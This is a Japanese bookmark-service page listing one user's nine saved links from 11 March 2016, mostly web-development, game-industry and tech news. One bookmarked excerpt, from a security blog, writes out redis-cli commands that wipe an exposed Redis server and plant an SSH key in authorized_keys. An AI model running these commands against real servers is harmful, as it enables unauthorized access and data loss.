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2016年3月11日のブックマーク (9件)

  • EventEmitterバケツリレースタイル/フレームワークなしで小さくFluxする - Qiita

    想定しているシチュエーション 非SPA環境で個別にマウントされるコンポーネントがそれぞれで小さくFluxするような環境。 SPAガッツリ組むのでないなら、Fluxフレームワークは不要だと思っていて、とは言えオレオレ構成も行き過ぎると害になる。 その辺のバランスをとって、次のような構成がいいのではないか、と考えてみた。 考え方 コンテナがEventEmitterを1つ保持する コンテナはEventEmitterの各種イベントをListenする コンテナはpropsとstateを区別して扱い、stateを更新する コンテナはコンポーネントを一つだけ描画する コンポーネントはpropsとして渡されたEventEmitterを発火させる コンポーネントはEventEmitterをListenしない コンポーネントはpropsのみ扱う コード // src/components/header.js

    EventEmitterバケツリレースタイル/フレームワークなしで小さくFluxする - Qiita
    toshiwo
    toshiwo 2016/03/11
  • フロム・ソフトウェア1DAYインターンシップに潜入!最前線のデザイナーが学生にアドバイス | Game*Spark - 国内・海外ゲーム情報サイト

    『DARK SOULS』シリーズや『Bloodborne』(発売元: 株式会社ソニー・コンピュータエンタテインメント)など、世界的に人気のトリプルAタイトルを世に送り出すフロム・ソフトウェア。2016年2月、同社のデザイナーからデザイン画の制作過程を学べる1DAYインターンシップが行われました。12名の学生が参加し、過去に社内でも取り組んだテーマを題材にして各自が事前にデザイン画を作成。作品のフィードバックやデザイン例を通じて、フロム・ソフトウェアのデザインについての考え方を伝えるという内容です。 冒頭、フロム・ソフトウェアが過去に開発したタイトルが紹介されると共に、職種の解説が行われました。グラフィック職について同社では3つの分野に分かれており、デザイナーが2Dの原画を制作し、ゲームグラフィックデザイナーが3DCG化、CGデザイナーはゲームの世界観を紹介するCGムービーを制作するという役

    フロム・ソフトウェア1DAYインターンシップに潜入!最前線のデザイナーが学生にアドバイス | Game*Spark - 国内・海外ゲーム情報サイト
    toshiwo
    toshiwo 2016/03/11
    フロムでインターンとかうらやま!!!
  • MMD ☓ Songle

    加速度センサーをお使いの場合は端末を落としたり周囲にぶつからないようにしてください. 破損・怪我をした際の責任は負いかねます のでご了承ください. 設定によって端末に高負荷がかかり,電池を消費することが考えられます. 電池残量にご注意ください. ライブ中に端末の画面が暗くなるかもしれません.端末の設定で バックライト設定を変更することをお勧めします. ネットワークの環境によってはモーションと音源が合わないことがあります. 高速回線(WiFi)を使うことをお勧めします. MMDのモデルデータなど,比較的大きいサイズのデータの通信が発生します. 3G, 4G/LTE回線をお使いの際には通信速度制限にお気をつけ下さい. 通信料金に関する責任は負いかねますのでご了承ください. AdBlockなどJavaScriptを制限する拡張機能をお使いの場合,プログラムが動作しない場合がございます. 動作は

    MMD ☓ Songle
    toshiwo
    toshiwo 2016/03/11
  • 就職して9年が過ぎる - 兼雑記

    転職して7年が過ぎたというのを読んで気づいたんだけど、そろそろ入社後9年が経過したらしい。僕は結構長い期間をここで過ごしたことになるんだなと思った。ちょっと以前のことを振り返ってみようと思う。言うまでもないけどこれは僕の書ける範囲での個人的な感想と体験談であって会社の見解等を表しているものではない。 きっかけ わりと重要でない Borgチーム (の周辺) いつのまにやらBorgという名前を普通に言って良くなっている。嬉しい。まあ当時もぶっちゃけ、秘密だから出してないっていうよりは、単に誰もアカデミア的なキャリアに興味が無いから出してなかったんだと思う(私見)。 さて、当時Borgというかクラスタマネージメントのあたりでは、コンピュータのリソースて適当にたくさん使ってるけど、これ節約したらすっげー支出減ったりしない?みたいなのがホットで、なんかとりあえず色々な人々が色んなことをやっていた。い

    就職して9年が過ぎる - 兼雑記
    toshiwo
    toshiwo 2016/03/11
  • Redisで任意のファイルをアップロードする攻撃 | csirt.mrtc0.log

    まず, 攻撃者は既に格納されているキーとバリューをクリアします. その後, 自身の公開鍵を適当なキー(ここではpwnというキー)で保存します. そしてデータを書き出すディレクトリ(/home/user/.ssh/)を設定し, ファイル名をauthorized_keysとします. 最後にデータを書き出します. [1] $ redis-cli -h 172.17.0.2 flushall $ cat id_rsa.pub| redis-cli -h 172.17.0.2 -x set pwn $ redis-cli -h 172.17.0.2 172.17.0.2:6379> config set dir "/home/user/.ssh" OK 172.17.0.2:6379> config get dir 1) "dir" 2) "/home/user/.ssh" 172.17.0.2:6

    toshiwo
    toshiwo 2016/03/11
  • Add Reactions to Pull Requests, Issues, and Comments

    ProductAdd Reactions to Pull Requests, Issues, and CommentsEvery day, thousands of people are having conversations on GitHub around code, design, bugs, and new ideas. Sometimes there are complex and nuanced points to be made, but other times… Every day, thousands of people are having conversations on GitHub around code, design, bugs, and new ideas. Sometimes there are complex and nuanced points to

    Add Reactions to Pull Requests, Issues, and Comments
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    toshiwo 2016/03/11
  • Apple Events - Keynote March 2016 - Apple

    More ways to shop: Visit an Apple Store, call 1-800-MY-APPLE, or find a reseller.

    Apple Events - Keynote March 2016 - Apple
    toshiwo
    toshiwo 2016/03/11
  • React Nativeを用いた初めてのiOSアプリ開発 : 選んだ理由と、開発で学んだこと | POSTD

    候補としてモバイルアプリの作成について話し合いを始めた時、何を用いてモバイルアプリを構築するかについて、私たちには何の考えもありませんでした。クールな仕様で、楽しく使え、さらには洗練されたものでありたいという一般的な方向性は分かっていたのですが、誰もモバイルアプリを構築した経験がなかったのです。 そこで私たちはReact Nativeを使ってみることにしました。選んでみて良かったと思っています。この記事では、React Nativeを使うと決めた時に考えたことや、構築途中で学んだことを書き綴っています。 React Nativeを選んだ理由 私たちはWeb開発者であって、iOS開発者ではありません。ニューヨークでの集まりで、Swiftがどれだけ性能がいいか、それでいてObjective-Cもまだ存在価値があるということを、少しかじった程度で、一番得意なのはRubyJavascriptです

    React Nativeを用いた初めてのiOSアプリ開発 : 選んだ理由と、開発で学んだこと | POSTD
    toshiwo
    toshiwo 2016/03/11
  • 実録。ぼくはこうしてソシャゲを潰した。(沢しおん) - カクヨム

    騙すほうより、騙されるほうが悪いって、ほんとうですか。龍の王さま? 沢しおん ぼくが10年以上前、『龍ノ王(仮称)』というネトゲタイトルを事業的に大爆死させたときの話のほか、『封印オンライン(仮称)』の運営立ち上げに支離滅裂になった話などを綴っていきます。 他者の権利を侵害しないよう文中の名称等はアレンジしておりますが、基的にノンフィクションです。

    実録。ぼくはこうしてソシャゲを潰した。(沢しおん) - カクヨム
    toshiwo
    toshiwo 2016/03/11
    カクヨムのホラージャンル怖すぎんよ(てきとう